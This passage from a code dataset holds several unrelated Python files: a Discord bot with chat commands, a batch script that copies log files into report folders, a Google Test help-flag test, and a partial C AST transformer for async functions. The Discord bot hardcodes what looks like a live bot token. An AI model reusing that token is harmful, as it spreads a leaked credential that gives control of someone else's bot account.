message.content.startswith(\"!ping\"):\r\n emb = (discord.Embed(title=\":ping_pong: **Ping**\",description=\"PONG!...Did that take long? :smiley:\",colour = 0x3df270))\r\n await client.send_message(message.channel, embed=emb)\r\n elif message.content.startswith(\"!8ball\"):\r\n emb = (discord.Embed(title=':8ball: **8ball**',description=random.choice([\"It is certain :8ball:\",\r\n \"It is decidedly so :8ball:\",\r\n \"Yes, definitely :8ball:\",\r\n \"You may rely on it :8ball:\",\r\n \"As i see it, yes :8ball:\",\r\n \"Most likely :8ball:\",\r\n \"Outlook good :8ball:\",\r\n \"Yes :8ball:\",\r\n \"Signs point to yes :8ball:\",\r\n \"Reply hazy try again :8ball:\",\r\n \"Ask again later :8ball:\",\r\n \"Better not tell you now :8ball:\",\r\n \"Cannot predict now :8ball:\",\r\n \"Concentrate and ask again :8ball:\",\r\n \"Don't count on it :8ball:\",\r\n \"My reply is no :8ball:\",\r\n \"My sources say no :8ball:\",\r\n \"Outlook not so good :8ball:\",\r\n \"Very doubtful :8ball:\"]),colour = 0x3df270))\r\n await client.send_message(message.channel, embed=emb)\r\n elif message.content.startswith(\"!rps\"):\r\n \r\n await client.send_message(message.channel, user)\r\n# JOIN AND LEAVE MESSAGE\r\n@client.event\r\nasync def on_member_join(member):\r\n channel = member.server.get_channel(\"519241179142029324\")\r\n emb = (discord.Embed(title=\":wave: **Welcome**\",description=\"Welcome to {1.name}, {0.mention}, enjoy your stay mate\".format(member, member.server),colour = 0x3df270))\r\n await client.send_message(channel, embed=emb)\r\n@client.event\r\nasync def on_member_remove(member):\r\n channel = member.server.get_channel(\"519241179142029324\")\r\n emb = (discord.Embed(title=\":middle_finger: **Bye**\",description=\"I never liked you {0.mention}... sleep with you left eye opened...\".format(member, member.server),colour = 0x3df270))\r\n await client.send_message(channel, embed=emb)\r\n# BALANCE MESSAGE\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return \r\n elif message.content.startswith(\"!bal\"): \r\n emb = (discord.Embed(title =\":moneybag: **Balance**\",description=\"Your balance is currently : $\",colour = 0x3df270))\r\n await client.send_message(message.channel, embed = emb)\r\n \r\n\r\n \r\nclient.run(\"NTE5MjM5ODYyNzkzMjczMzk2.DuccDQ.4w1WuS2XAfjtjodNWcjX7I17VvY\")\r\n","sub_path":"Mickey_base.py","file_name":"Mickey_base.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458744042","text":"import com.ihsan.foundation.pobjecthelper as phelper\r\nimport os, string\r\n\r\n# globals\r\ngid = -1\r\npod_status = \"C:\\\\logs\\\\console\\\\logsvr\\\\pod_status\\\\2423.log\"\r\npod_detail = \"C:\\\\logs\\\\console\\\\logsvr\\\\pod_detail\\\\2423.log\"\r\n\r\ndef DAFLongScriptMain(config, parameter, pid, monfilename):\r\n global gid\r\n \r\n gid = pid\r\n helper = phelper.PObjectHelper(config)\r\n bp = helper.CreateObject('BatchProcess', parameter)\r\n \r\n try:\r\n Process(config, bp)\r\n bp.Notify_OK()\r\n except:\r\n bp.Notify_Error()\r\n #-- try..except..\r\n \r\n return 1\r\n\r\ndef GetReportDir(config, branchCode):\r\n\r\n # Folder sesuai tanggal POD\r\n Q_TglPOD = \"select nilai_parameter_tanggal from liability.parameterglobal \\\r\n where kode_parameter='POD'\"\r\n oResPOD = config.CreateSQL(Q_TglPOD).rawresult\r\n \r\n tglPOD = oResPOD.nilai_parameter_tanggal\r\n if (tglPOD != None):\r\n tglPOD = string.zfill(tglPOD[2],2) + '-' + string.zfill(tglPOD[1],2) + '-' + str(tglPOD[0]) \r\n\r\n reportDir1 = 'z:/reports/' + tglPOD \r\n if not os.path.exists(reportDir1):\r\n #direktori log tidak ada, maka buatkan direktori log\r\n os.mkdir(reportDir1)\r\n \r\n reportDir2 = reportDir1 + '/Result/'\r\n if not os.path.exists(reportDir2):\r\n #direktori log tidak ada, maka buatkan direktori log\r\n os.mkdir(reportDir2) \r\n\r\n reportDir3 = reportDir2 + branchCode\r\n if not os.path.exists(reportDir3):\r\n #direktori log tidak ada, maka buatkan direktori log\r\n os.mkdir(reportDir3) \r\n\r\n return reportDir3\r\n\r\ndef Process(config, bp):\r\n global gid\r\n \r\n i_status = config.CreateSQL(\"\\\r\n select nilai_parameter from corporate.parameterglobal \\\r\n where kode_parameter = 'ST_GLOBAL'\").rawresult.nilai_parameter\r\n \r\n i_detail = config.CreateSQL(\"\\\r\n select nilai_parameter from corporate.parameterglobal \\\r\n where kode_parameter = 'ST_DETAIL'\").rawresult.nilai_parameter\r\n \r\n f_status = open(pod_status, \"r\")\r\n f_detail = open(pod_detail, \"r\")\r\n \r\n fw_status = open(GetReportDir(config, 'DCO')+ \"/pod_status.txt\", \"w\")\r\n fw_detail = open(GetReportDir(config, 'DCO')+ \"/pod_detail.txt\", \"w\") \r\n try:\r\n # read pod status\r\n s_line = f_status.readline()\r\n i = 1\r\n while i < i_status and s_line != '':\r\n s_line = f_status.readline()\r\n i += 1\r\n #- while\r\n \r\n while s_line != '':\r\n fw_status.write(s_line)\r\n s_line = f_status.readline()\r\n #-- while\r\n \r\n # read pod detail\r\n s_line = f_detail.readline()\r\n i = 1\r\n while i < i_detail and s_line != '':\r\n s_line = f_detail.readline()\r\n i += 1\r\n #- while\r\n \r\n while s_line != '':\r\n fw_detail.write(s_line)\r\n s_line = f_detail.readline()\r\n i += 1 \r\n #-- while \r\n finally:\r\n f_status.close()\r\n f_detail.close() \r\n fw_status.close()\r\n fw_detail.close()\r\n #-- try.finally\r\n ","sub_path":"scripts/BP/L_SimpanLogPOD.py","file_name":"L_SimpanLogPOD.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133846391","text":"#!/usr/bin/env python\n\"\"\"Tests the --help flag of Google C++ Testing Framework.\n\nSYNOPSIS\n gtest_help_test.py --gtest_build_dir=BUILD/DIR\n # where BUILD/DIR contains the built gtest_help_test_ file.\n gtest_help_test.py\n\"\"\"\n\n__author__ = 'wan@google.com (Zhanyong Wan)'\n\nimport os\nimport re\nimport gtest_test_utils\n\n\nIS_WINDOWS = os.name == 'nt'\n\nPROGRAM_PATH = gtest_test_utils.GetTestExecutablePath('gtest_help_test_')\nFLAG_PREFIX = '--gtest_'\nCATCH_EXCEPTIONS_FLAG = FLAG_PREFIX + 'catch_exceptions'\nDEATH_TEST_STYLE_FLAG = FLAG_PREFIX + 'death_test_style'\n\n# The help message must match this regex.\nHELP_REGEX = re.compile(\n FLAG_PREFIX + r'list_tests.*' +\n FLAG_PREFIX + r'filter=.*' +\n FLAG_PREFIX + r'also_run_disabled_tests.*' +\n FLAG_PREFIX + r'repeat=.*' +\n FLAG_PREFIX + r'shuffle.*' +\n FLAG_PREFIX + r'random_seed=.*' +\n FLAG_PREFIX + r'color=.*' +\n FLAG_PREFIX + r'print_time.*' +\n FLAG_PREFIX + r'output=.*' +\n FLAG_PREFIX + r'break_on_failure.*' +\n FLAG_PREFIX + r'throw_on_failure.*',\n re.DOTALL)\n\n\ndef RunWithFlag(flag):\n \"\"\"Runs gtest_help_test_ with the given flag.\n\n Returns:\n the exit code and the text output as a tuple.\n Args:\n flag: the command-line flag to pass to gtest_help_test_, or None.\n \"\"\"\n\n if flag is None:\n command = [PROGRAM_PATH]\n else:\n command = [PROGRAM_PATH, flag]\n child = gtest_test_utils.Subprocess(command)\n return child.exit_code, child.output\n\n\nclass GTestHelpTest(gtest_test_utils.TestCase):\n \"\"\"Tests the --help flag and its equivalent forms.\"\"\"\n\n def TestHelpFlag(self, flag):\n \"\"\"Verifies that the right message is printed and the tests are\n skipped when the given flag is specified.\"\"\"\n\n exit_code, output = RunWithFlag(flag)\n self.assertEquals(0, exit_code)\n self.assert_(HELP_REGEX.search(output), output)\n if IS_WINDOWS:\n self.assert_(CATCH_EXCEPTIONS_FLAG in output, output)\n self.assert_(DEATH_TEST_STYLE_FLAG not in output, output)\n else:\n self.assert_(CATCH_EXCEPTIONS_FLAG not in output, output)\n self.assert_(DEATH_TEST_STYLE_FLAG in output, output)\n\n def testPrintsHelpWithFullFlag(self):\n self.TestHelpFlag('--help')\n\n def testPrintsHelpWithShortFlag(self):\n self.TestHelpFlag('-h')\n\n def testPrintsHelpWithQuestionFlag(self):\n self.TestHelpFlag('-?')\n\n def testPrintsHelpWithWindowsStyleQuestionFlag(self):\n self.TestHelpFlag('/?')\n\n def testRunsTestsWithoutHelpFlag(self):\n \"\"\"Verifies that when no help flag is specified, the tests are run\n and the help message is not printed.\"\"\"\n\n exit_code, output = RunWithFlag(None)\n self.assert_(exit_code != 0)\n self.assert_(not HELP_REGEX.search(output), output)\n\n\nif __name__ == '__main__':\n gtest_test_utils.Main()\n","sub_path":"external/protobuf/gtest/test/gtest_help_test.py","file_name":"gtest_help_test.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104132634","text":"import copy\nfrom collections import OrderedDict\nfrom six import iteritems\n\nimport pycparser.c_ast as c_ast\nfrom pycparserext.ext_c_parser import TypeDeclExt, ArrayDeclExt, FuncDeclExt, AttributeSpecifier\n\nfrom .error import CodeSyntaxError\nfrom .parser import StructImproved, LambdaFunc, YieldNode\nfrom .scope import Scope\nfrom .types import *\nfrom .expression import *\n\n\nclass ASTTransformer(c_ast.NodeVisitor):\n def __init__(self):\n self.scope = None\n self.root_scope = None\n self.scheduled_decls = list()\n self.scheduled_tmp_decls = list()\n self.node_path = list()\n self.cur_lambda_id = 0\n self.lambdas = dict()\n self.need_async_call = False\n self.next_async_func_id = 0\n self.next_async_state_id = 1\n self.func_async_states = OrderedDict()\n self.local_ids = set()\n self.local_ids_in_cur_async_state = set()\n self.func_async_state_decls = OrderedDict()\n self.async_returns = list()\n self.id_translate_table = dict()\n\n def visit(self, node):\n self.node_path.append(node)\n retval = super(ASTTransformer, self).visit(node)\n del self.node_path[-1]\n return retval\n\n def visit_FileAST(self, node):\n self.root_scope = Scope()\n self.scope = self.root_scope\n i = 0\n while i < len(node.ext):\n i = self.visit_DeclByIndex(node.ext, i)\n self.scope = None\n self.root_scope = None\n\n def visit_DeclByIndex(self, lst, i):\n scheduled_secls = self.scheduled_decls\n self.scheduled_decls = list()\n self.visit(lst[i])\n j = 0\n while j < len(self.scheduled_decls):\n if self.scheduled_decls[j][1]:\n lst.insert(i, self.scheduled_decls[j][0])\n i = self.visit_DeclByIndex(lst, i)\n j += 1\n i += 1\n j = 0\n while j < len(self.scheduled_decls):\n if not self.scheduled_decls[j][1]:\n lst.insert(i, self.scheduled_decls[j][0])\n i = self.visit_DeclByIndex(lst, i)\n j += 1\n self.scheduled_decls = scheduled_secls\n return i\n\n def visit_IdentifierType(self, node):\n assert isinstance(node, c_ast.IdentifierType)\n full_type_name = ' '.join(node.names)\n type_info = self.scope.find_symbol(full_type_name)\n if type_info is not None:\n if not isinstance(type_info, TypeInfo):\n raise CodeSyntaxError('%s is not name of type' % full_type_name, node.coord)\n return type_info\n return ScalarTypeInfo(full_type_name)\n\n def visit_Enum(self, node):\n assert isinstance(node, c_ast.Enum)\n return ScalarTypeInfo('int')\n\n def visit_Struct(self, node):\n return self.visit_StructOrUnion(node)\n\n def visit_StructImproved(self, node):\n return self.visit_StructOrUnion(node)\n\n def visit_Union(self, node):\n return self.visit_StructOrUnion(node)\n\n def visit_StructOrUnion(self, node):\n assert isinstance(node, (c_ast.Struct, c_ast.Union))\n kind = 'union' if isinstance(node, c_ast.Union) else 'struct'\n parent = None\n if isinstance(node, StructImproved):\n parent = self.scope.find_symbol('struct %s' % node.parent)\n if not isinstance(parent, StructTypeInfo):\n raise CodeSyntaxError('%s is not name of struct type' % node.parent, node.coord)\n type_info = None\n if node.name is not None:\n type_info = self.scope.find_symbol('%s %s' % (kind, node.name))\n if type_info is None:\n type_info = StructTypeInfo(kind, node.name, self)\n type_info.scope = Scope()\n type_info.scope.attrs.add('struct')\n type_info.scope.owner = type_info\n if node.name is not None:\n self.root_scope.add_symbol('%s %s' % (kind, node.name), type_info)\n if node.decls is not None:\n prev_scope = self.scope\n self.scope = type_info.scope\n self.scope.symbols.clear()\n self.scope.parents.clear()\n self.scope.parents.append(parent.scope if parent is not None else None)\n self.scope.parents.append(prev_scope)\n self.generic_visit(node)\n type_info.parent = parent\n type_info.scope = self.scope\n type_info.ast_node = node\n self.scope = prev_scope\n return type_info\n\n def visit_TypeDecl(self, node):\n assert isinstance(node, (c_ast.TypeDecl, TypeDeclExt))\n type_info = self.visit(node.type)\n if isinstance(node.type, c_ast.Struct):\n node.type = type_info.to_decl()\n type_info = type_info.clone()\n type_info.quals += node.quals\n return type_info\n\n def visit_TypeDeclExt(self, node):\n return self.visit_TypeDecl(node)\n\n def visit_ArrayDecl(self, node):\n assert isinstance(node, (c_ast.ArrayDecl, ArrayDeclExt))\n type_info = self.visit(node.type)\n dim = None\n if node.dim is not None:\n dim = self.visit(node.dim)\n return ArrayTypeInfo(type_info, dim)\n\n def visit_ArrayDeclExt(self, node):\n assert isinstance(node, ArrayDeclExt)\n return self.visit_ArrayDecl(node)\n\n def visit_FuncDecl(self, node):\n assert isinstance(node, (c_ast.FuncDecl, FuncDeclExt))\n return_type = self.visit(node.type)\n args = list()\n if node.args is not None:\n for arg_decl in node.args.params:\n if isinstance(arg_decl, c_ast.Decl):\n arg_type_info = self.visit(arg_decl.type)\n init = self.visit(arg_decl.init) if arg_decl.init is not None else None\n args.append(FuncArgInfo(arg_decl.name, arg_type_info, init))\n arg_decl.init = None\n elif isinstance(arg_decl, c_ast.Typename):\n arg_type_info = self.visit(arg_decl.type)\n args.append(FuncArgInfo(arg_decl.name, arg_type_info, None))\n elif isinstance(arg_decl, c_ast.EllipsisParam):\n args.append(None)\n break\n type_info = FuncTypeInfo(return_type, args)\n return type_info\n\n def visit_FuncDeclExt(self, node):\n assert isinstance(node, FuncDeclExt)\n return self.visit_FuncDecl(node)\n\n def visit_PtrDecl(self, node):\n assert isinstance(node, c_ast.PtrDecl)\n type_info = self.visit(node.type)\n type_info = PtrTypeInfo(type_info, node.quals)\n return type_info\n\n def visit_Typename(self, node):\n assert isinstance(node, c_ast.Typename)\n return self.visit(node.type)\n\n def visit_Decl(self, node):\n assert isinstance(node, c_ast.Decl)\n if isinstance(self.scope.owner, StructTypeInfo):\n self.scope.owner.fix_member_declaration(node)\n elif (len(self.node_path) >= 2) and isinstance(self.node_path[-2], (c_ast.Compound, c_ast.For)):\n if node.name not in self.scope.symbols:\n prefix = node.name\n i = 0\n while self.scope.find_symbol(node.name) is not None:\n i += 1\n node.name = '%s_%s' % (prefix, i)\n if i > 0:\n self.id_translate_table[prefix] = node.name\n tmp = node.type\n while not isinstance(tmp, c_ast.TypeDecl):\n tmp = tmp.type\n tmp.declname = node.name\n if isinstance(node.name, tuple):\n assert len(node.name) == 2\n struct_type_info = self.scope.find_symbol(\"struct %s\" % node.name[0])\n if not isinstance(struct_type_info, StructTypeInfo):\n raise CodeSyntaxError('%s is not structure name' % node.name[0], node.coord)\n member_name = node.name[1]\n new_name = '%s_%s' % (struct_type_info.name, member_name)\n node.name = new_name\n tmp = node.type\n while not isinstance(tmp, c_ast.TypeDecl):\n tmp = tmp.type\n tmp.declname = new_name\n struct_type_info.fix_member_implementation(node, member_name)\n type_info = self.visit(node.type)\n if isinstance(node.type, c_ast.Struct):\n node.type = type_info.to_decl()\n var_info = None\n if node.name is not None:\n symbol = self.scope.find_symbol(node.name, True)\n if symbol is not None:\n fail = True\n if isinstance(symbol, VariableInfo):\n if symbol.type.__class__ == type_info.__class__:\n if 'extern' in symbol.storage:\n fail = False\n elif isinstance(type_info, FuncTypeInfo):\n if 'struct' in self.scope.attrs:\n fail = False\n else:\n tmp = symbol.type\n if not isinstance(tmp, PtrTypeInfo):\n tmp = PtrTypeInfo(tmp)\n if TypeInfo.is_compatible(type_info, tmp):\n fail = False\n if fail:\n raise CodeSyntaxError('Symbol %s already defined in current scope' % node.name, node.coord)\n var_info = VariableInfo(node.name, type_info, node.storage, self.scope, coord=node.coord)\n if 'struct' in self.scope.attrs:\n var_info.attrs.add('member')\n self.scope.add_symbol(node.name, var_info)\n if node.init is not None:\n init = self.visit(node.init)\n if init is not None:\n self.scope.symbols[node.name].init = init\n init = TypeInfo.make_safe_cast(init, type_info)\n if init is not None:\n node.init = init.ast_node\n self.scope.symbols[node.name].init = init\n else:\n pass # Warning\n if 'static' not in node.storage:\n tmp = self.scope\n while tmp is not None:\n if isinstance(tmp.owner, FuncTypeInfo):\n self.local_ids.add(var_info.name)\n self.local_ids_in_cur_async_state.add(var_info.name)\n break\n if len(tmp.parents) == 0:\n break\n tmp = tmp.parents[0]\n return var_info\n\n def visit_Typedef(self, node):\n assert isinstance(node, c_ast.Typedef)\n type_info = self.visit(node.type)\n self.scope.add_symbol(node.name, type_info)\n\n def visit_Constant(self, node):\n assert isinstance(node, c_ast.Constant)\n return ConstantExpression(node.value, node.type, node)\n\n def visit_ID(self, node):\n assert isinstance(node, c_ast.ID)\n node.name = self.id_translate_table.get(node.name, node.name)\n symbol_scope = self.scope\n symbol_name = node.name\n if isinstance(node.name, tuple):\n if len(node.name) != 2:\n raise CodeSyntaxError('Only struct_id::member_name format is supported')\n struct_type_info = self.scope.find_symbol('struct %s' % node.name[0])\n if not isinstance(struct_type_info, StructTypeInfo):\n raise CodeSyntaxError('%s is not a structure name' % node.name[0], node)\n symbol_scope = struct_type_info.scope\n symbol_name = node.name[1]\n elif symbol_name in self.local_ids:\n if symbol_name not in self.local_ids_in_cur_async_state:\n self.func_async_state_decls[symbol_name] = True\n self.local_ids_in_cur_async_state.add(symbol_name)\n elif symbol_name not in self.scope.symbols:\n tmp = self.scope\n while (tmp is not None) and not isinstance(tmp.owner, c_ast.FuncDef):\n if isinstance(tmp.owner, (c_ast.While, c_ast.DoWhile, c_ast.For)):\n self.func_async_state_decls[symbol_name] = True\n self.local_ids_in_cur_async_state.add(symbol_name)\n break\n tmp = tmp.parents[-1]\n return VariableExpression(symbol_name, symbol_scope, node)\n\n def visit_UnaryOp(self, node):\n assert isinstance(node, c_ast.UnaryOp)\n if node.op == '&':\n tmp = node.expr\n while not isinstance(tmp, c_ast.ID):\n if isinstance(tmp, c_ast.StructRef):\n tmp = tmp.name\n elif isinstance(tmp, c_ast.ArrayRef):\n tmp = tmp.name\n else:\n break\n if isinstance(tmp, c_ast.ID):\n self.func_async_state_decls[tmp.name] = True\n self.local_ids_in_cur_async_state.add(tmp.name)\n return UnaryExpression(node.op, self.visit(node.expr), node)\n\n def visit_BinaryOp(self, node):\n assert isinstance(node, c_ast.BinaryOp)\n return BinaryExpression(node.op, self.visit(node.left), self.visit(node.right), node)\n\n def visit_TernaryOp(self, node):\n assert isinstance(node, c_ast.TernaryOp)\n return TernaryExpression(node.cond, node.iftrue, node.iffalse, node)\n\n def visit_Cast(self, node):\n assert isinstance(node, c_ast.Cast)\n type_info = self.visit(node.to_type)\n return CastExpression(self.visit(node.expr), type_info, node)\n\n def visit_ArrayRef(self, node):\n assert isinstance(node, c_ast.ArrayRef)\n return SubscriptExpression(self.visit(node.name), self.visit(node.subscript), node)\n\n def visit_StructRef(self, node):\n assert isinstance(node, c_ast.StructRef)\n assert isinstance(node.field, c_ast.ID)\n return MemberExpression(self.visit(node.name), node.field.name, node.type, node)\n\n def visit_FuncCall(self, node):\n assert isinstance(node, c_ast.FuncCall)\n args = list()\n if node.args is not None:\n for arg in node.args.exprs:\n args.append(self.visit(arg))\n func = self.visit(node.name)\n if self.need_async_call:\n raise CodeSyntaxError('Async call should not be a part of a complex expression', node.coord)\n return CallExpression(func, args, node, self)\n\n def visit_Assignment(self, node):\n assert isinstance(node, c_ast.Assignment)\n return BinaryExpression(node.op, self.visit(node.lvalue), self.visit(node.rvalue), node)\n\n def visit_YieldNode(self, node):\n assert isinstance(node, YieldNode)\n return YieldExpression(node)\n\n def visit_Compound(self, node):\n assert isinstance(node, c_ast.Compound)\n if node.block_items is not None:\n prev_scope = self.scope\n self.scope = Scope(self.scope)\n self.scope.attrs = prev_scope.attrs\n self.scope.owner = self.node_path[-2]\n i = 0\n while i < len(node.block_items):\n retval = self.visit(node.block_items[i])\n if isinstance(retval, Expression):\n node.block_items[i] = retval.ast_node\n for decl in self.scheduled_tmp_decls:\n node.block_items.insert(i, decl)\n i += 1\n self.scheduled_tmp_decls.clear()\n if self.need_async_call:\n async_state_label_name = '__async_state_%i' % self.next_async_state_id\n self.func_async_states[self.next_async_state_id] = async_state_label_name\n return_node = c_ast.Return(None, node.block_items[i].coord)\n self.async_returns.append(return_node)\n node.block_items.insert(i + 1, return_node)\n node.block_items.insert(i + 2, c_ast.Label(async_state_label_name, None,\n node.block_items[i].coord))\n node.block_items.insert(i, c_ast.Assignment(\n '=',\n c_ast.StructRef(\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME), '->', c_ast.ID('__state')\n ),\n c_ast.Constant('int', str(self.next_async_state_id)),\n node.block_items[i].coord\n ))\n i += 1\n self.next_async_state_id += 1\n self.need_async_call = False\n self.local_ids_in_cur_async_state.clear()\n i += 1\n self.scope = prev_scope\n\n def visit_If(self, node):\n assert isinstance(node, c_ast.If)\n value = self.visit(node.cond)\n node.cond = value.ast_node\n if node.iftrue is not None:\n self.visit(node.iftrue)\n if node.iffalse is not None:\n self.visit(node.iffalse)\n\n def visit_While(self, node):\n assert isinstance(node, c_ast.While)\n value = self.visit(node.cond)\n node.cond = value.ast_node\n if node.stmt is not None:\n self.visit(node.stmt)\n\n def visit_DoWhile(self, node):\n assert isinstance(node, c_ast.DoWhile)\n if node.stmt is not None:\n self.visit(node.stmt)\n value = self.visit(node.cond)\n node.cond = value.ast_node\n\n def visit_Switch(self, node):\n assert isinstance(node, c_ast.Switch)\n value = self.visit(node.cond)\n node.cond = value.ast_node\n self.visit(node.stmt)\n\n def visit_Return(self, node):\n assert isinstance(node, c_ast.Return)\n if node.expr:\n value = self.visit(node.expr)\n i = len(self.node_path) - 1\n while i >= 0:\n n = self.node_path[i]\n if isinstance(n, c_ast.FuncDef):\n symbol = self.scope.find_symbol(n.decl.name)\n assert isinstance(symbol, VariableInfo)\n assert isinstance(symbol.type, FuncTypeInfo)\n type_info = symbol.type.return_type\n value = TypeInfo.make_safe_cast(value, type_info)\n break\n i -= 1\n node.expr = value.ast_node\n\n def visit_FuncDef(self, node):\n assert isinstance(node, c_ast.FuncDef)\n name_ = node.decl.name\n var_info = self.visit(node.decl)\n prev_scope = self.scope\n self.scope = Scope(self.scope)\n self.scope.owner = self.lambdas.get(node.decl.name, var_info.type)\n assert isinstance(var_info.type, FuncTypeInfo)\n for arg in var_info.type.args:\n if arg is not None:\n self.scope.add_symbol(arg.name, VariableInfo(arg.name, arg.type_info, list(), self.scope))\n self.local_ids.clear()\n self.local_ids_in_cur_async_state.clear()\n self.id_translate_table.clear()\n self.func_async_state_decls.clear()\n if isinstance(name_, tuple):\n assert len(name_) == 2\n type_info = self.scope.find_symbol('struct %s' % name_[0])\n if isinstance(type_info, StructTypeInfo):\n self.scope.parents.insert(0, type_info.scope)\n self.scope.attrs.add('member')\n type_info.fix_func_implementation(node, name_[1], self)\n else:\n raise CodeSyntaxError('%s is not a structure name' % name_[0], node.coord)\n if isinstance(self.scope.owner, LambdaFuncTypeInfo):\n for capture_item in self.scope.owner.capture_list:\n symbol = VariableInfo(capture_item.name, capture_item.type_info, ['closure'], self.scope)\n if capture_item.link:\n symbol.attrs.add('link')\n self.scope.add_symbol(symbol.name, symbol)\n self.func_async_states.clear()\n self.async_returns.clear()\n self.visit(node.body)\n if len(self.func_async_states) > 0:\n i = 0\n static_async_state_storage = False\n while i < len(node.decl.funcspec):\n if isinstance(node.decl.funcspec[i], AttributeSpecifier):\n if node.decl.funcspec[i].exprlist is not None:\n if len(node.decl.funcspec[i].exprlist.exprs) == 1:\n if isinstance(node.decl.funcspec[i].exprlist.exprs[0], c_ast.ID):\n if node.decl.funcspec[i].exprlist.exprs[0].name == 'static_async_state':\n static_async_state_storage = True\n del node.decl.funcspec[i]\n break\n i += 1\n args_names = list()\n if node.decl.type.args is not None:\n for arg_decl in node.decl.type.args.params:\n if isinstance(arg_decl, c_ast.EllipsisParam):\n raise CodeSyntaxError('Async functions cannot be variadic', node.coord)\n elif isinstance(arg_decl, c_ast.Decl):\n self.func_async_state_decls[arg_decl.name] = arg_decl\n args_names.append(arg_decl.name)\n if not isinstance(node.decl.type.type, c_ast.TypeDecl)\\\n or not isinstance(node.decl.type.type.type, c_ast.IdentifierType)\\\n or ' '.join(node.decl.type.type.type.names) != 'void':\n raise CodeSyntaxError('Async functions cannot return value', node.coord)\n decl = node.decl\n func_body_name = '__async_func_%s' % self.cur_lambda_id\n self.schedule_decl(decl, True)\n wrapper_func_body = list()\n if static_async_state_storage:\n state_storage_name = '%s_storage' % LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME\n wrapper_func_body += [\n c_ast.Decl(\n state_storage_name,\n list(), ['static'], list(),\n c_ast.TypeDecl(\n state_storage_name,\n list(),\n c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n None\n )\n ),\n None, None\n ),\n c_ast.Decl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(), list(), list(),\n c_ast.PtrDecl(\n list(),\n c_ast.TypeDecl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(),\n c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n None\n )\n )\n ),\n c_ast.UnaryOp(\n '&',\n c_ast.ID(state_storage_name)\n ),\n None\n )\n ]\n else:\n wrapper_func_body.append(c_ast.Decl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(), list(), list(),\n c_ast.PtrDecl(\n list(),\n c_ast.TypeDecl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(),\n c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n None\n )\n )\n ),\n c_ast.FuncCall(\n c_ast.ID('malloc'),\n c_ast.ExprList([\n c_ast.UnaryOp('sizeof', c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n None\n ))\n ])\n ),\n None\n ))\n wrapper_func_body += \\\n [\n c_ast.Assignment(\n '=',\n c_ast.StructRef(c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME),\n '->', c_ast.ID('__state')),\n c_ast.Constant('int', '0')\n )\n ] + \\\n [c_ast.Assignment(\n '=',\n c_ast.StructRef(c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME),\n '->', c_ast.ID(arg_name)),\n c_ast.ID(arg_name)\n ) for arg_name in args_names] + \\\n [\n c_ast.FuncCall(\n c_ast.ID(func_body_name),\n c_ast.ExprList([\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME)\n ])\n )\n ]\n self.schedule_decl(c_ast.FuncDef(\n decl, None,\n c_ast.Compound(wrapper_func_body),\n decl.coord\n ))\n node.decl = c_ast.Decl(\n func_body_name,\n list(), ['static'], list(),\n c_ast.FuncDecl(\n c_ast.ParamList([\n c_ast.Decl(\n LambdaFuncTypeInfo.CLOSURE_LINK_NAME,\n list(), list(), list(),\n c_ast.PtrDecl(\n ['const'],\n c_ast.TypeDecl(\n LambdaFuncTypeInfo.CLOSURE_LINK_NAME,\n list(),\n c_ast.IdentifierType(['void'])\n )\n ),\n None, None\n )\n ]),\n c_ast.TypeDecl(\n func_body_name,\n list(),\n c_ast.IdentifierType(['void'])\n )\n ),\n None, None,\n decl.coord\n )\n node.body.block_items.insert(0, self.make_async_state_switch())\n self.schedule_decl(c_ast.Decl(\n None, list(), list(), list(),\n c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n self.make_async_state_struct_fields_list()\n ),\n None, None,\n node.coord\n ), True)\n node.body.block_items.insert(0, c_ast.Decl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(), list(), list(),\n c_ast.PtrDecl(\n ['const'],\n c_ast.TypeDecl(\n LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME,\n list(),\n c_ast.Struct(\n LambdaFuncTypeInfo.CLOSURE_DATA_TYPE_NAME_FMT % func_body_name,\n None\n )\n )\n ),\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_LINK_NAME),\n None\n ))\n node.body.block_items.append(c_ast.Label(\n '__exit',\n c_ast.FuncCall(\n c_ast.ID('free'),\n c_ast.ExprList([\n c_ast.ID(LambdaFuncTypeInfo.CLOSURE_DATA_LINK_NAME)\n ])\n ) if not static_async_state_storage else c_ast.Return(None)\n ))\n self.cur_lambda_id += 1\n self.async_returns.clear()\n self.func_async_state_decls.clear()\n self.local_ids_in_cur_async_state.clear()\n self.local_ids.clear()\n self.id_translate_table.clear()\n self.scope = prev_scope\n\n def visit_LambdaFunc(self, node):\n assert isinstance(node, LambdaFunc)\n func_name = LambdaFuncTypeInfo.LAMBDA_FUNC_NAME_FMT % self.cur_lambda_id\n self.cur_lambda_id += 1\n prev_scope = self.scope\n self.scope = Scope(self.scope)\n return_type_info = self.visit(node.return_type)\n args = list()\n if node.args:\n for arg in node.args.params:\n if isinstance(arg, c_ast.Decl):\n type_info = self.visit(arg.type)\n args.append(FuncArgInfo(arg.name, 